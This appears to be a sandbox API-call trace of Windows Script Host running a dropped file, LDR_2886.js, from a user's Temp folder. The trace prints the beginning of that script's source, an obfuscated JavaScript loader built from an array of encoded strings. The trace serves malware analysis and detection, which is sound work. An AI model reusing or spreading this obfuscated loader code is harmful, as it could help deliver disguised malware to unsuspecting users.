	[0115.670] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x25e178, lpData=0x25e580, lpcbData=0x25e170*=0x400 | out: lpType=0x25e178*=0x1, lpData="1", lpcbData=0x25e170*=0x4) returned 0x0
	[0115.670] lstrlenW (lpString="1") returned 1
	[0115.670] lstrlenW (lpString="0") returned 1
	[0115.670] lstrlenW (lpString="1") returned 1
	[0115.670] lstrlenW (lpString="no") returned 2
	[0115.670] lstrlenW (lpString="1") returned 1
	[0115.670] lstrlenW (lpString="false") returned 5
	[0115.670] RegCloseKey (hKey=0x7c) returned 0x0
	[0115.670] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x25ee08, lpdwDisposition=0x0 | out: phkResult=0x25ee08*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0115.670] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x25eda4, lpData=0x25ee00, lpcbData=0x25eda0*=0x4 | out: lpType=0x25eda4*=0x0, lpData=0x25ee00*=0x30, lpcbData=0x25eda0*=0x4) returned 0x2
	[0115.670] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x25e178, lpData=0x25e580, lpcbData=0x25e170*=0x400 | out: lpType=0x25e178*=0x0, lpData=0x25e580*=0x31, lpcbData=0x25e170*=0x400) returned 0x2
	[0115.670] RegCloseKey (hKey=0x7c) returned 0x0
	[0115.670] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js") returned 48
	[0115.670] lstrlenW (lpString="js") returned 2
	[0115.671] lstrlenW (lpString="WSH") returned 3
	[0115.671] ??2@YAPEAX_K@Z () returned 0x3b5870
	[0115.671] LoadStringW (in: hInstance=0xffa90000, uID=0x9c5, lpBuffer=0x25d870, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
	[0115.671] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x25e8b0*=0x0 | out: pptlib=0x25e8b0*=0x41d100) returned 0x0
	[0115.676] ITypeLib:GetTypeInfoOfGuid (in: This=0x41d100, GUID=0xffa958f0, ppTInfo=0x25e898 | out: ppTInfo=0x25e898*=0x41e4e8) returned 0x0
	[0115.678] ITypeInfo:GetRefTypeOfImplType (in: This=0x41e4e8, index=0xffffffff, pRefType=0x25e890 | out: pRefType=0x25e890*=0xfffffffe) returned 0x0
	[0115.678] ITypeInfo:GetRefTypeInfo (in: This=0x41e4e8, hreftype=0xfffffffe, ppTInfo=0xffaaf458 | out: ppTInfo=0xffaaf458*=0x41e540) returned 0x0
	[0115.678] IUnknown:Release (This=0x41e4e8) returned 0x1
	[0115.678] ??2@YAPEAX_K@Z () returned 0x3b5900
	[0115.678] ??2@YAPEAX_K@Z () returned 0x3b59a0
	[0115.678] ??2@YAPEAX_K@Z () returned 0x3b5a00
	[0115.678] ITypeLib:GetTypeInfoOfGuid (in: This=0x41d100, GUID=0xffa95950, ppTInfo=0x25e898 | out: ppTInfo=0x25e898*=0x41e598) returned 0x0
	[0115.678] ITypeInfo:GetRefTypeOfImplType (in: This=0x41e598, index=0xffffffff, pRefType=0x25e890 | out: pRefType=0x25e890*=0xfffffffe) returned 0x0
	[0115.679] ITypeInfo:GetRefTypeInfo (in: This=0x41e598, hreftype=0xfffffffe, ppTInfo=0xffaaf4d8 | out: ppTInfo=0xffaaf4d8*=0x41e5f0) returned 0x0
	[0115.679] IUnknown:Release (This=0x41e598) returned 0x1
	[0115.679] ITypeLib:GetTypeInfoOfGuid (in: This=0x41d100, GUID=0xffa95960, ppTInfo=0x25e898 | out: ppTInfo=0x25e898*=0x41e648) returned 0x0
	[0115.679] ITypeInfo:GetRefTypeOfImplType (in: This=0x41e648, index=0xffffffff, pRefType=0x25e890 | out: pRefType=0x25e890*=0xfffffffe) returned 0x0
	[0115.679] ITypeInfo:GetRefTypeInfo (in: This=0x41e648, hreftype=0xfffffffe, ppTInfo=0xffaaf518 | out: ppTInfo=0xffaaf518*=0x41e6a0) returned 0x0
	[0115.679] IUnknown:Release (This=0x41e648) returned 0x1
	[0115.679] ITypeLib:GetTypeInfoOfGuid (in: This=0x41d100, GUID=0xffa95910, ppTInfo=0x25e898 | out: ppTInfo=0x25e898*=0x41e6f8) returned 0x0
	[0115.679] ITypeInfo:GetRefTypeOfImplType (in: This=0x41e6f8, index=0xffffffff, pRefType=0x25e890 | out: pRefType=0x25e890*=0xfffffffe) returned 0x0
	[0115.679] ITypeInfo:GetRefTypeInfo (in: This=0x41e6f8, hreftype=0xfffffffe, ppTInfo=0xffaaf498 | out: ppTInfo=0xffaaf498*=0x41e750) returned 0x0
	[0115.679] IUnknown:Release (This=0x41e6f8) returned 0x1
	[0115.679] IUnknown:Release (This=0x41d100) returned 0x4
	[0115.679] ??2@YAPEAX_K@Z () returned 0x3b5a60
	[0115.679] GetCurrentThreadId () returned 0x8ec
	[0115.679] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc
	[0115.679] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xffaa1cf8, lpParameter=0x3b5a60, dwCreationFlags=0x0, lpThreadId=0x3b5a88 | out: lpThreadId=0x3b5a88*=0x764) returned 0xd4
	[0115.680] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x25eaf0*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0115.932] CloseHandle (hObject=0xcc) returned 1
	[0115.932] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", nBufferLength=0x104, lpBuffer=0x25eb80, lpFilePart=0x25eb70 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", lpFilePart=0x25eb70*="LDR_2886.js") returned 0x30
	[0115.932] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".js", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e090 | out: phkResult=0x25e090*=0xe6) returned 0x0
	[0115.932] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x25e040, lpData=0x25e0a0, lpcbData=0x25e044*=0x800 | out: lpType=0x25e040*=0x1, lpData="JSFile", lpcbData=0x25e044*=0xe) returned 0x0
	[0115.932] RegCloseKey (hKey=0xe6) returned 0x0
	[0115.932] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="JSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e090 | out: phkResult=0x25e090*=0xe6) returned 0x0
	[0115.932] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x25e040, lpData=0x25e910, lpcbData=0x25e044*=0x200 | out: lpType=0x25e040*=0x1, lpData="JScript", lpcbData=0x25e044*=0x10) returned 0x0
	[0115.933] RegCloseKey (hKey=0xe6) returned 0x0
	[0115.933] ??2@YAPEAX_K@Z () returned 0x3b63a0
	[0115.933] GetProcessHeap () returned 0x3f0000
	[0115.933] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x2000) returned 0x428430
	[0115.933] CLSIDFromString (in: lpsz="JScript", pclsid=0x25e888 | out: pclsid=0x25e888*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58))) returned 0x0
	[0115.934] CoCreateInstance (in: rclsid=0x25e888*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xffa91800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25e880 | out: ppv=0x25e880*=0x3b6780) returned 0x0
	[0115.941] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25ca80 | out: lpSystemTimeAsFileTime=0x25ca80*(dwLowDateTime=0xbd5b0370, dwHighDateTime=0x1d543d1)) 
	[0115.941] GetCurrentProcessId () returned 0x978
	[0115.942] GetCurrentThreadId () returned 0x8ec
	[0115.942] GetTickCount () returned 0x2d622
	[0115.942] QueryPerformanceCounter (in: lpPerformanceCount=0x25ca88 | out: lpPerformanceCount=0x25ca88*=24036767964) returned 1
	[0115.942] malloc (_Size=0x100) returned 0x3b6670
	[0115.942] __dllonexit () returned 0x7fee1410728
	[0115.942] __dllonexit () returned 0x7fee1410780
	[0115.942] __dllonexit () returned 0x7fee1410750
	[0115.943] __dllonexit () returned 0x7fee14107b0
	[0115.943] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefd710000
	[0115.943] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegisterTraceGuidsA") returned 0x7717f570
	[0115.943] EtwRegisterTraceGuidsA () returned 0x0
	[0115.943] EtwRegisterTraceGuidsA () returned 0x0
	[0115.943] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x25c670, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0115.944] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegOpenKeyExA") returned 0x7fefd72b5f0
	[0115.944] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x25c7d8 | out: phkResult=0x25c7d8*=0x0) returned 0x2
	[0115.951] GetVersion () returned 0x1db10106
	[0115.952] ??2@YAPEAX_K@Z () returned 0x3b5aa0
	[0115.952] ??2@YAPEAX_K@Z () returned 0x3b6780
	[0115.952] GetUserDefaultLCID () returned 0x409
	[0115.952] GetACP () returned 0x4e4
	[0115.953] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0115.953] GetCurrentThreadId () returned 0x8ec
	[0115.953] ??2@YAPEAX_K@Z () returned 0x3b5aa0
	[0115.953] GetCurrentThreadId () returned 0x8ec
	[0115.953] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e7b8 | out: phkResult=0x25e7b8*=0x104) returned 0x0
	[0115.953] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegQueryValueExA") returned 0x7fefd72c480
	[0115.953] RegQueryValueExA (in: hKey=0x104, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x25e7b0, lpData=0x25e7a8, lpcbData=0x25e7a0*=0x4 | out: lpType=0x25e7b0*=0x4, lpData=0x25e7a8*=0x1, lpcbData=0x25e7a0*=0x4) returned 0x0
	[0115.953] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegCloseKey") returned 0x7fefd730710
	[0115.953] RegCloseKey (hKey=0x104) returned 0x0
	[0115.953] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000
	[0115.954] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetObjectContext") returned 0x7fefea4c920
	[0115.954] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefea30000
	[0115.954] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoCreateInstance") returned 0x7fefea57490
	[0115.954] CoCreateInstance (in: rclsid=0x7fee147cba0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee147cd80*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25e780 | out: ppv=0x25e780*=0x7fefec0a1b0) returned 0x0
	[0115.955] ??2@YAPEAX_K@Z () returned 0x3b6b30
	[0115.955] ??2@YAPEAX_KHPEBDH@Z () returned 0x3b5af0
	[0115.955] ??2@YAPEAX_K@Z () returned 0x3b6bf0
	[0115.955] ??2@YAPEAX_K@Z () returned 0x3b6c50
	[0115.956] ??2@YAPEAX_K@Z () returned 0x3b7140
	[0115.956] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x25e740, nSize=0x27 | out: lpBuffer="") returned 0x0
	[0115.956] GetUserDefaultLCID () returned 0x409
	[0115.956] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
	[0115.956] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x25e7e0, cchData=6 | out: lpLCData="1252") returned 5
	[0115.956] IsValidCodePage (CodePage=0x4e4) returned 1
	[0115.956] CoCreateInstance (in: rclsid=0x7fee1475d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee1475d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x3b6af0 | out: ppv=0x3b6af0*=0x4275b0) returned 0x0
	[0115.956] IUnknown:AddRef (This=0x4275b0) returned 0x2
	[0115.956] GetCurrentProcessId () returned 0x978
	[0115.956] GetCurrentThreadId () returned 0x8ec
	[0115.956] GetTickCount () returned 0x2d632
	[0115.956] ISystemDebugEventFire:BeginSession (This=0x4275b0, guidSourceID=0x7fee1475da8, strSessionName="JScript:00002424:00002284:18185906") returned 0x0
	[0115.956] GetCurrentThreadId () returned 0x8ec
	[0115.956] ??2@YAPEAX_K@Z () returned 0x3b71e0
	[0115.956] ??2@YAPEAX_K@Z () returned 0x3b7230
	[0115.956] malloc (_Size=0x80) returned 0x3b72e0
	[0115.956] malloc (_Size=0x108) returned 0x3b7370
	[0115.957] GetTickCount () returned 0x2d632
	[0115.957] GetCurrentThreadId () returned 0x8ec
	[0115.957] ??2@YAPEAX_K@Z () returned 0x3b7480
	[0115.957] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\ldr_2886.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x110
	[0115.957] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0115.957] CreateFileMappingA (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b68, lpName=0x0) returned 0x114
	[0115.957] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x110000
	[0115.957] GetVersionExA (in: lpVersionInformation=0x25e990*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xfd343301, dwBuildNumber=0x7fe, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x25e990*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0115.957] IsTextUnicode (in: lpv=0x110000, iSize=19304, lpiResult=0x25e980 | out: lpiResult=0x25e980) returned 0
	[0115.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x110000, cbMultiByte=19304, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19304
	[0115.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x110000, cbMultiByte=19304, lpWideCharStr=0x42f978, cchWideChar=19304 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0115.958] UnmapViewOfFile (lpBaseAddress=0x110000) returned 1
	[0115.958] CloseHandle (hObject=0x114) returned 1
	[0115.959] CloseHandle (hObject=0x110) returned 1
	[0115.959] GetSystemDirectoryA (in: lpBuffer=0x25ea08, uSize=0x0 | out: lpBuffer="Lî%") returned 0x14
	[0115.959] ??2@YAPEAX_K@Z () returned 0x3b74d0
	[0115.959] GetSystemDirectoryA (in: lpBuffer=0x3b74d0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0115.959] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7fefd710000
	[0115.959] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0115.959] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferIdentifyLevel") returned 0x7fefd72e470
	[0115.959] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefd72f9b0
	[0115.959] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferCloseLevel") returned 0x7fefd72f660
	[0115.959] IdentifyCodeAuthzLevelW () returned 0x1
	[0116.210] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25db80 | out: lpSystemTimeAsFileTime=0x25db80*(dwLowDateTime=0xbd837ad0, dwHighDateTime=0x1d543d1)) 
	[0116.210] GetCurrentProcessId () returned 0x978
	[0116.210] GetCurrentThreadId () returned 0x8ec
	[0116.210] GetTickCount () returned 0x2d72b
	[0116.210] QueryPerformanceCounter (in: lpPerformanceCount=0x25db88 | out: lpPerformanceCount=0x25db88*=24063586094) returned 1
	[0116.210] malloc (_Size=0x100) returned 0x3b7b60
	[0116.210] GetVersionExA (in: lpVersionInformation=0x25d960*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe33af810, dwBuildNumber=0x7fe, dwPlatformId=0xe33a0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x25d960*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0116.210] GetUserDefaultLCID () returned 0x409
	[0116.210] IsFileSupportedName () returned 0x1
	[0116.210] _wcsicmp (_String1=".vbs", _String2=".js") returned 12
	[0116.210] _wcsicmp (_String1=".vbe", _String2=".js") returned 12
	[0116.210] _wcsicmp (_String1=".js", _String2=".js") returned 0
	[0116.394] GetSignedDataMsg () returned 0x0
	[0116.394] GetCurrentProcess () returned 0xffffffffffffffff
	[0116.394] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x114, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x25e1c0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x25e1c0*=0x140) returned 1
	[0116.394] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0116.395] ??2@YAPEAX_K@Z () returned 0x3ba4f0
	[0116.395] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0116.395] ReadFile (in: hFile=0x140, lpBuffer=0x3ba4f0, nNumberOfBytesToRead=0x4b68, lpNumberOfBytesRead=0x25e1a0, lpOverlapped=0x0 | out: lpBuffer=0x3ba4f0*, lpNumberOfBytesRead=0x25e1a0*=0x4b68, lpOverlapped=0x0) returned 1
	[0116.395] CoInitialize (pvReserved=0x0) returned 0x1
